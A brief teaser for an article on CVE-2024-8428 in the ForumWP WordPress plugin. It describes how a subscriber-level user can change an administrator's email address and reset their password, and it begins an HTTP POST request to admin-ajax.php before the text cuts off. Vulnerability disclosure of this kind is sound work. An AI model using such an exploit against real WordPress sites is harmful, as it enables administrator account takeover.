CVE-2024-8428: forumwp
## The Exploit An authenticated subscriber-level user can change the email address—and by extension, reset the password—of any administrator account. ```http POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target-wordpress.local Content-Type...
Read article →